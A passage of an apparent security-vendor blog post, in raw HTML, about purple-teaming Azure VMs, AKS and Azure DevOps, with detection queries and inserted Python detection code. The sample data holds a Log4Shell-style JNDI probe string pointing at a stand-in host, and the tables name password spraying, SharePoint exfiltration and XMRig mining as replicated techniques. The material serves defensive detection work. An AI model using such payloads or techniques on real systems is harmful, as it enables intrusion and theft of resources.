the team came across <a href=\"https:\/\/www.mandiant.com\/resources\/blog\/azure-run-command-dummies\" target=\"_blank\" rel=\"noopener\">an awesome blog post<\/a> regarding Azure virtual machine run commands and wanted to see if their environment had the necessary telemetry in place to detect this activity.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5893b478f44383c4bb0d1c02ee7de545\">A test virtual machine is provisioned and a run command is issued to it. The command executes successfully, but no telemetry related to this event is visible.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-ec15825ffdec6e9b6428b2c0e89ef5aa\">The Azure AD diagnostic settings are double checked, and everything seems to be enabled: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1118\" height=\"1630\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-Azure-Virtual-Machines.jpg\" alt=\"Purple teaming Azure Virtual Machines\" class=\"wp-image-4564\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-e4fae009bdc18e2022914a3fec99dc8e\">After some digging, it is discovered that there is another diagnostic setting that was missed.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-6894f3c0a74a04e62538932e5db3f75d\">Navigating in the Azure portal to Monitor, then Activity log, the activity is visible there, but the engineers do not have these events forwarded anywhere, such as to an event hub.<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"565\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/VM-run-command.jpg\" alt=\"VM run command\" class=\"wp-image-4565\" title=\"\"><\/figure>\n<\/div>\n\n\n<p 
class=\"has-delft-blue-color has-text-color has-link-color wp-elements-57310b5e07c2b229d5db17f21a8e19f9\">The team goes ahead and creates the new diagnostic setting, forwarding all activity to an event hub: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1114\" height=\"1550\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Navigating-to-the-Azure-portal.jpg\" alt=\"VM run command\" class=\"wp-image-4566\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-9d2a742da1d5c1c28ad986f9caf0557e\">A run command is issued to the virtual machine again, and this time the necessary telemetry is present and a CloudSIEM rule is crafted:<strong><br><\/strong><\/p>\n\n\n\n<pre>   metadata_vendor = 'Microsoft'\r\nAND metadata_product = 'Azure'\r\nAND action = \"Administrative\"\r\nAND description = \"MICROSOFT.COMPUTE\/VIRTUALMACHINES\/RUNCOMMAND\/ACTION\"\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-81aa082f438e9662785106325d3b4ae7\">With a signal being generated: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1473\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/CloudSIEM-rule-is-crafted.jpg\" alt=\"CloudSIEM rule is crafted\" class=\"wp-image-4567\" title=\"\"><\/figure>\n<\/div>\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-58e60ea9311f893ac081c46b2338ef92\" id=\"delete_virtual_machines\">Delete Virtual Machines<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-294716a14e660e7e53b07b4d138ac9bb\">The team now moves from a run command to deleting a virtual machine, to 
ensure that they get some kind of signal or alert when a virtual machine is deleted in their environment. The team creates and deletes a test virtual machine, and everything works: the deletion is an Administrative event in the same Activity log feed that was just connected, so no further data source is needed.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-be5cfcb753b64c3a880ffa5b8ad56940\">The team receives the following CloudSIEM signal: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1586\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Delete-Virtual-Machines.jpg\" alt=\"Delete virtual machine signal\" class=\"wp-image-4568\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5562e907de6f1316b0976ef3fc9c424d\">A smooth test in which everything worked as expected; the team is happy with this result and updates their notes:&nbsp;<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi-factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<tr>\n<td>SharePoint Exfiltration<\/td>\n<td>Create test SharePoint site, run SnaffPoint to search for a sensitive file and then download the 
file<\/td>\n<td>Office 365 logs, SharePoint operations<\/td>\n<td>Detection Crafted<\/td>\n<\/tr>\n<tr>\n<td>Teams External Access Enabled<\/td>\n<td>Browse to Office admin portal, enable external access to Teams<\/td>\n<td>Office 365, TeamsAdminAction<\/td>\n<td>No, CloudSIEM Signal created for enablement of external Teams guest access<\/td>\n<\/tr>\n<tr>\n<td>VM Run Command<\/td>\n<td>Browse to Azure Portal, Select test Virtual Machine, Navigate to \u201cRun command\u201d, pick any and execute a benign command<\/td>\n<td>Azure Monitor Diagnostic Setting &#8211; Administrative Events specifically<\/td>\n<td>No, data source missing, was added as part of exercise<\/td>\n<\/tr>\n<tr>\n<td>Delete Virtual machine<\/td>\n<td>Browse to Azure Portal, select test virtual machine, execute deletion<\/td>\n<td>Azure administrative logs<\/td>\n<td>Yes, signal generated<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-4756ebf32faced661e1516226d0dff93\" id=\"purple_teaming_aks\">Purple teaming AKS<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-4794c9d990a4668c989ccfd5a0d1c0ef\" id=\"internet-accessible_cluster\">Internet-accessible cluster<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-51cbbfc3df665034e38b99a03a4d0837\">The team is excited to continue their purple team, and shifts gears to focus on their Azure Kubernetes Service (AKS) deployment.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2e6dab1216c848a715953d066165492f\">They would like to know if they have the relevant telemetry and detection logic necessary to ascertain when an external IP address attempts to connect to their cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-4bdc735c39199879789a533a12077c26\">The team proceeds to execute a 
simple curl command to attempt to connect to their cluster:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1764\" height=\"428\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-AKS.jpg\" alt=\"Purple teaming AKS\" class=\"wp-image-4569\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-71e2037fbeeca6af2f7d2370d3ccfb67\">As a next step, the telemetry needs to be examined to ascertain whether this activity is visible.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-eb681b499ccd7b45e07a5130f0387015\">Rather than specifically searching for a curl user agent, the team wants to start with a broader query that looks at unauthorized requests from external IP addresses to their AKS cluster.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-690d2f4001674339d31072913b14a138\">The following query is crafted:<\/p>\n\n\n\n<pre>_source=\"Azure AKS\" and _collector=\"Azure AKS\"\r\n| where category = \"kube-audit\"\r\n| json field=%\"properties.log\" \"userAgent\" as userAgent\r\n| json field=%\"properties.log\" \"responseStatus.message\" as responseMessage\r\n| json field=%\"properties.log\" \"sourceIPs[0]\" as sourceIP\r\n| json field=%\"properties.log\" \"requestURI\" as requestURI\r\n| isPublicIP(sourceIP) as is_public_ip\r\n| where responseMessage = \"Unauthorized\"\r\n| where is_public_ip\r\n| values(userAgent) as user_agents,values(requestURI) as URIs by sourceIP\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-196cba218767ed82fe8ed51e49aad5eb\">Everyone is extremely surprised by the results!<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-18ad37c9bdda63e3e27f722a9c2344af\">Not only&nbsp; is the curl request visible, resulting in an unauthorized response, but 
many other exploitation and discovery attempts from a wide range of IP addresses are seen, including Log4Shell (Log4j) exploit attempts:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1556\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Internet-accessible-cluster.jpg\" alt=\"Internet-accessible cluster\" class=\"wp-image-4570\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-3e3b725b49a4086784571dda3e04756c\">In this instance, given the sheer volume of noise hitting the cluster, the team agrees that crafting detections for this type of activity is not the best use of their limited resources: an alert that fires on every internet scanner would bury the rare unauthorized request that actually matters.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c0d499f8dc369911bfe009a3e71b9b50\">The Kubernetes administrator is brought in and shown what kind of traffic is hitting the cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2d693e58be20ec4cd8c2be8a79469115\">After speaking with management and showing them the results of this purple team execution, everyone is in agreement that this configuration &#8211; a publicly exposed AKS API server &#8211; brings unnecessary risk to the enterprise.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a7f8cf2622cb325859817e542baa85ff\">A path forward is agreed upon: restrict the API server with an IP allow-list (AKS authorized IP ranges), so that not every public IP can attempt to connect to it. 
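To show the detections of this Azure VM and AKS part of the exercise running over actual log records rather than only as CloudSIEM queries, here is an added Python example; it is not code from the original post or from Sumo Logic. It consumes one Azure Monitor export batch, the {"records": [...]} envelope that both the Activity log diagnostic setting and the AKS kube-audit diagnostic category deliver to an event hub, and implements the VM run-command and VM-delete signals, the unauthorized-request-from-public-IP search above (with the ipaddress module standing in for isPublicIP), and the pod-creation and exec-into-pod searches from the crypto-mining subsection that follows. Every record, subscription, resource name, user name and IP address is constructed; the caller claim key identity.claims.name is an assumption, since real Activity log exports key the claims by their full URIs. Three caveats the page's queries do not cover are built in: the Activity log writes several records per operation (Start, Accept, Success) that share a correlationId, so the VM signals are collapsed per correlationId; the pod-creation search excludes system: accounts, because pods created by a Deployment's ReplicaSet are also create-pods events, just with the replicaset-controller as the user; and exec is matched on objectRef.subresource rather than only on tty=true in the URI, so a non-interactive kubectl exec is caught as well.

```python
import ipaddress
import json
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

RUN_COMMAND_OP = "MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION"
DELETE_VM_OP = "MICROSOFT.COMPUTE/VIRTUALMACHINES/DELETE"
VM_ID = "/subscriptions/sub-0000/resourceGroups/rg-test/providers/Microsoft.Compute/virtualMachines/vm-test"

def activity(op, result, corr, caller="alice@fakeorg.example", ip="1.2.3.4"):
    # Constructed Activity log record (category Administrative). identity.claims.name is an
    # assumption; real exports key the claims by their full URIs.
    return {"category": "Administrative", "operationName": op, "resultType": result, "correlationId": corr,
            "resourceId": VM_ID, "callerIpAddress": ip, "identity": {"claims": {"name": caller}}}

def kube_audit(verb, uri, agent, src_ip, user, resource, name=None, subresource=None, kind=None, denied=False):
    # Constructed kube-audit record as AKS ships it: the audit event JSON-encoded in properties.log.
    ev = {"verb": verb, "requestURI": uri, "userAgent": agent, "sourceIPs": [src_ip], "user": {"username": user},
          "objectRef": {"resource": resource, "name": name, "subresource": subresource},
          "responseStatus": {"message": "Unauthorized", "code": 401} if denied else {"code": 201}}
    if kind:  # only requests that carry a body have a requestObject
        ev["requestObject"] = {"kind": kind, "metadata": {"name": name}}
    return {"category": "kube-audit", "properties": {"log": json.dumps(ev)}}

EXEC_TTY = "/api/v1/namespaces/default/pods/ubuntu/exec?command=bash&container=ubuntu&stdin=true&stdout=true&tty=true"
EXEC_NOTTY = "/api/v1/namespaces/default/pods/ubuntu/exec?command=id&container=ubuntu&stdout=true"
SAMPLE_EXPORT = {"records": [  # one export batch; every record is constructed for this example
    activity(RUN_COMMAND_OP, "Start", "corr-1"), activity(RUN_COMMAND_OP, "Success", "corr-1"),
    activity(DELETE_VM_OP, "Start", "corr-2"), activity(DELETE_VM_OP, "Success", "corr-2"),
    # internet noise against the API server: the curl test and a Log4Shell-style probe
    kube_audit("get", "/api/v1/namespaces", "curl/8.1.2", "1.2.3.4", "system:anonymous", "namespaces", denied=True),
    kube_audit("get", "/api/v1/pods", "${jndi:ldap://scanner.invalid/a}", "8.8.4.4", "system:anonymous", "pods", denied=True),
    # an operator creating a bare pod and a Deployment, then the controller creating the Deployment's pod
    kube_audit("create", "/api/v1/namespaces/default/pods", "kubectl/v1.27.3", "10.240.0.5", "alice@fakeorg.example", "pods", "ubuntu", kind="Pod"),
    kube_audit("create", "/apis/apps/v1/namespaces/default/deployments", "kubectl/v1.27.3", "10.240.0.5", "alice@fakeorg.example", "deployments", "web", kind="Deployment"),
    kube_audit("create", "/api/v1/namespaces/default/pods", "kube-controller-manager/v1.27.3", "10.240.0.4", "system:serviceaccount:kube-system:replicaset-controller", "pods", "web-7c9d-x1z", kind="Pod"),
    # exec into the pod, once interactive (-it) and once not
    kube_audit("create", EXEC_TTY, "kubectl/v1.27.3", "10.240.0.5", "alice@fakeorg.example", "pods", "ubuntu", subresource="exec"),
    kube_audit("create", EXEC_NOTTY, "kubectl/v1.27.3", "10.240.0.5", "alice@fakeorg.example", "pods", "ubuntu", subresource="exec"),
]}

def vm_signals(records):
    # Run command / VM delete from Administrative records, one signal per correlationId: the
    # Activity log writes Start, Accept and Success records for a single operation.
    signals = {}
    for r in records:
        op = str(r.get("operationName", "")).upper()
        if r.get("category") != "Administrative" or op not in (RUN_COMMAND_OP, DELETE_VM_OP):
            continue
        sig = signals.setdefault((r.get("correlationId"), op), {
            "operation": op, "resource": r.get("resourceId"), "caller_ip": r.get("callerIpAddress"),
            "caller": r.get("identity", {}).get("claims", {}).get("name"), "results": []})
        sig["results"].append(r.get("resultType"))
    return list(signals.values())

def kube_events(records):
    # kube-audit records carry the audit event as a JSON string; decode it once here.
    return (json.loads(r["properties"]["log"]) for r in records if r.get("category") == "kube-audit")

def source_ip(ev):
    return (ev.get("sourceIPs") or [""])[0]

def is_public(ip):
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False

def unauthorized_external(records):
    # Unauthorized API requests from public source IPs, grouped by IP (the first AKS query above).
    by_ip = defaultdict(lambda: {"user_agents": set(), "uris": set()})
    for ev in kube_events(records):
        if ev.get("responseStatus", {}).get("message") == "Unauthorized" and is_public(source_ip(ev)):
            by_ip[source_ip(ev)]["user_agents"].add(ev.get("userAgent", ""))
            by_ip[source_ip(ev)]["uris"].add(ev.get("requestURI", ""))
    return dict(by_ip)

def bare_pod_creations(records):
    # create on pods with a Pod body, minus system: accounts, so the pods the ReplicaSet
    # controller creates for a Deployment are not reported as hand-made pods.
    found = []
    for ev in kube_events(records):
        ref, user = ev.get("objectRef") or {}, ev.get("user", {}).get("username", "")
        if (ev.get("verb") == "create" and ref.get("resource") == "pods" and not ref.get("subresource")
                and ev.get("requestObject", {}).get("kind") == "Pod" and not user.startswith("system:")):
            found.append({"pod": ref.get("name"), "user": user, "src": source_ip(ev)})
    return found

def exec_sessions(records):
    # exec/attach into a pod. Matching the subresource also catches `kubectl exec pod -- cmd`;
    # the tty=true URI match on the page only sees interactive (-t) sessions, so tty is kept as an attribute.
    found = []
    for ev in kube_events(records):
        ref = ev.get("objectRef") or {}
        if ref.get("resource") == "pods" and ref.get("subresource") in ("exec", "attach"):
            q = parse_qs(urlparse(ev.get("requestURI", "")).query)
            found.append({"pod": ref.get("name"), "user": ev.get("user", {}).get("username"), "src": source_ip(ev),
                          "tty": q.get("tty", ["false"])[0] == "true", "command": q.get("command", [])})
    return found
```

Running the four functions over SAMPLE_EXPORT["records"] yields two VM signals (one run command, one delete, each with results Start and Success), two noisy public IPs for the unauthorized search, a single bare pod (ubuntu, created by a person) even though three create-pods events are present, and two exec sessions of which only the first is interactive.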
A huge win for the purple team exercise!&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-2ae65e56d82830ada3cdcff9f36faa04\" id=\"crypto_mining\">Crypto mining<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-8d11f92f185cf24d7f60583639fa3b75\">Many attacks on exposed Kubernetes clusters end with the deployment of some kind of crypto miner. It is decided that this activity should be replicated within the AKS cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-732462e042a232e4547800405f419ce4\">A basic Ubuntu pod YAML definition is crafted and deployed to the cluster:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1034\" height=\"856\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Crypto-mining.jpg\" alt=\"Crypto mining\" class=\"wp-image-4571\" title=\"\"><\/figure>\n<\/div>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-87eb709e02f4b6e349f41cf006e5a43c\">A bash shell is opened inside the pod, and an XMRig miner is installed and run:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"935\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Ubuntu-pod-YAML.jpg\" alt=\"Ubuntu pod YAML\" class=\"wp-image-4572\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a5cb514dd601dfd885246cd5e16f7c1e\">After a few minutes of letting the pod run the XMRig process, the team receives the following alert: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" 
decoding=\"async\" width=\"1999\" height=\"951\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Xmrig-process.jpg\" alt=\"Xmrig process\" class=\"wp-image-4573\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2d650059d5496e918f42f9c06abc659a\">Because the <a href=\"https:\/\/help.sumologic.com\/docs\/observability\/kubernetes\/quickstart\/\" target=\"_blank\" rel=\"noopener\">Sumo Logic Kubernetes solution<\/a> was already deployed on the cluster, pod-level metrics, and with them this high-CPU alert, were available without any additional engineering effort.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-3b0b02fd73fb042ab45e12388317e101\">In addition to monitoring for high CPU usage, it was also decided to craft a query that looks for pods being created in the cluster.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-36bac155f47a4cf178bb70e83596962a\">This would be suspicious activity for this particular Kubernetes cluster: the engineering team responsible for Kubernetes deployments does not deploy bare pods, but wraps them in a Deployment definition, so pods are normally created by the ReplicaSet controller rather than by a person.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-87e566015523a5020798ef3041bf49be\">As mentioned previously, collaboration is critical to a purple team exercise: the FakeORG threat detection engineers learned something new about another team\u2019s internal process, which in turn gave them a baseline of normal behaviour to detect deviations from.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-1dc4c93c0e1fe6e821adb6bafa3dcae6\">The following query is crafted to determine when pods are created (the bare keyword ubuntu narrows it to the test pod; drop it for a general-purpose search): <br><\/p>\n\n\n\n<pre>_sourceCategory=AKS AND _source = \"Azure AKS\" ubuntu\r\n| json field=%\"properties.log\" \"verb\" as verb\r\n| json field=%\"properties.log\" \"objectRef.resource\" as 
resource\r\n| json field=%\"properties.log\" \"requestObject.kind\" as request_object\r\n| json field=%\"properties.log\" \"requestObject.metadata.name\" as object_name\r\n| json field=%\"properties.log\" \"sourceIPs[0]\" as sourceIP\r\n| where verb = \"create\"\r\n| where resource = \"pods\"\r\n| where request_object = \"Pod\"\r\n| values(object_name) as object_name,values(verb) as verb by sourceIP\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-da0032710605e2efd5031e2aecd995b6\"><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-6e7091401fac3cbc4e6694e152f42651\">And the results are returned: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1120\" height=\"298\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/FakeORG-threat-detection.jpg\" alt=\"FakeORG threat detection\" class=\"wp-image-4574\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7de55dbe5b6512870220682b74f22c74\">Another alert is crafted for when a terminal is attached to a pod within the cluster:<\/p>\n\n\n\n<pre>_sourceCategory=AKS AND _source = \"Azure AKS\" \r\n| json field=%\"properties.log\" \"requestURI\" as requestURI \r\n| json field=%\"properties.log\" \"sourceIPs[0]\" as sourceIP \r\n| where requestURI matches \/(tty=true)\/\r\n| values(requestURI) by sourceIP\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-20a9d26e736e1eb4db73cac2c96fb8e5\">And the results:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"592\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/threat-detection-vectors.jpg\" alt=\"threat detection vectors\" class=\"wp-image-4575\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color 
has-text-color has-link-color wp-elements-f49f9df967158666821d7d3a5d519c38\">Once again, the notes are updated:&nbsp;<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via Credmaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi-factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<tr>\n<td>SharePoint Exfiltration<\/td>\n<td>Create test SharePoint site, run SnaffPoint to search for a sensitive file and then download the file<\/td>\n<td>Office 365 logs, SharePoint operations<\/td>\n<td>Detection Crafted<\/td>\n<\/tr>\n<tr>\n<td>Teams External Access Enabled<\/td>\n<td>Browse to Office admin portal, enable external access to Teams<\/td>\n<td>Office 365, TeamsAdminAction<\/td>\n<td>No, CloudSIEM Signal created for enablement of external Teams guest access<\/td>\n<\/tr>\n<tr>\n<td>VM Run Command<\/td>\n<td>Browse to Azure Portal, Select test Virtual Machine, Navigate to \u201cRun command\u201d, pick any and execute a benign command<\/td>\n<td>Azure Monitor Diagnostic Setting &#8211; Administrative Events specifically<\/td>\n<td>No, data source missing, was added as part of exercise<\/td>\n<\/tr>\n<tr>\n<td>Delete Virtual machine<\/td>\n<td>Browse to Azure Portal, select test virtual machine, execute deletion<\/td>\n<td>Azure administrative 
logs<\/td>\n<td>Yes, signal generated<\/td>\n<\/tr>\n<tr>\n<td>Internet Accessible Cluster<\/td>\n<td>Attempt to use curl to connect to clusters external IP address<\/td>\n<td>AKS Diagnostic Logs Enabled &#8211; Kubernetes API Server<\/td>\n<td>NA &#8211; configuration change made<\/td>\n<\/tr>\n<tr>\n<td>CryptoMining<\/td>\n<td>Spin up pod, exec into pod, install Xmrig on pod<\/td>\n<td>AKS Diagnostic Logs Enabled &#8211; Kubernetes API Server<\/td>\n<td>Existing metrics-based detection, search looking for pod creations created, search for execution into pod also created<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-18c78d3e8384ca6c850d619345330ed0\" id=\"purple_teaming_azure_devops\">Purple teaming Azure DevOps<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-3c5101a18c02f484aad467d9da9283f9\" id=\"policy_tampering\">Policy tampering<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-246addb954884885f5afaa25d8c9f56d\">FakeORG is a relatively new user of Azure DevOps and is just getting started utilizing this service.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-1af57831f81d136c2648e926d6a2233d\">A risk for their organization is a threat actor making their way into the DevOps environment and infecting their development pipeline in order to set the stage for a supply-chain style attack.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c1be9fafb7bf153ad8979ca07042204b\">A requirement is set to monitor all policy changes in Azure DevOps, so the team navigates to the organizational settings menu in Azure DevOps and proceeds to enable Third-party application access via OAuth in order to see if this change can be observed in the telemetry. 
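As an added example that is not code from the original post, from Sumo Logic or from Microsoft, here are the two Azure DevOps checks this section builds (the policy change just described and the permission change examined in the next subsection) as Python over constructed audit-stream events. The events use an Event Grid envelope with the Azure DevOps audit entry under data, carrying the documented fields actionId, actorUPN, ipAddress and the action-specific data dictionary; keys are lower-cased before use because that is how the fields appear in the queries on this page. The policy-change actionId, the eventType string and the exact PermissionModifiedTo values are assumptions. One caveat worth encoding: the OAuth policy is a negation, Policy.DisallowOAuthAuthentication, so turning the "Third-party application access via OAuth" toggle on writes the value False, and that permissive state is the one to alert on, not every change.

```python
# Policies whose permissive state is the one worth a signal. The OAuth policy is a negation:
# enabling third-party OAuth in the portal writes Policy.DisallowOAuthAuthentication = False.
PERMISSIVE_POLICY_VALUES = {
    "policy.disallowoauthauthentication": "false",
}

# Permission names (prefix match, lower-cased) whose grant to "Allow" is treated as an elevation.
ELEVATED_PERMISSION_PREFIXES = ("administer", "manage", "delete", "create new projects")

def lower_keys(obj):
    # Recursively lower-case dictionary keys, mirroring the %"data.actorupn"-style field
    # names the page's collector exposes, so the checks below are case-insensitive.
    if isinstance(obj, dict):
        return {str(k).lower(): lower_keys(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [lower_keys(v) for v in obj]
    return obj

def audit_entries(events):
    # Each streamed event wraps one audit log entry under "data" (assumed Event Grid envelope).
    return (lower_keys(e).get("data", {}) for e in events)

def policy_changes(events):
    # Every entry carrying policyname/policyvalue, flagged permissive when the new value matches
    # the table above; string and boolean values are both normalised to lower-case text.
    out = []
    for entry in audit_entries(events):
        d = entry.get("data") or {}
        if "policyname" not in d or d.get("policyvalue") is None:
            continue
        name, value = str(d["policyname"]), str(d["policyvalue"]).lower()
        out.append({"policy": name, "value": value, "actor": entry.get("actorupn"),
                    "ip": entry.get("ipaddress"),
                    "permissive": PERMISSIVE_POLICY_VALUES.get(name.lower()) == value})
    return out

def permission_changes(events):
    # Security.ModifyPermission entries: who changed which permission on which subject, with
    # elevated=True when an administrative-style permission is set to Allow.
    out = []
    for entry in audit_entries(events):
        if entry.get("actionid") != "Security.ModifyPermission":
            continue
        d = entry.get("data") or {}
        perm, to = str(d.get("changedpermission", "")), str(d.get("permissionmodifiedto", ""))
        out.append({"subject": d.get("subjectdisplayname"), "permission": perm, "modified_to": to,
                    "actor": entry.get("actorupn"), "ip": entry.get("ipaddress"),
                    "elevated": to.lower() == "allow" and perm.lower().startswith(ELEVATED_PERMISSION_PREFIXES)})
    return out

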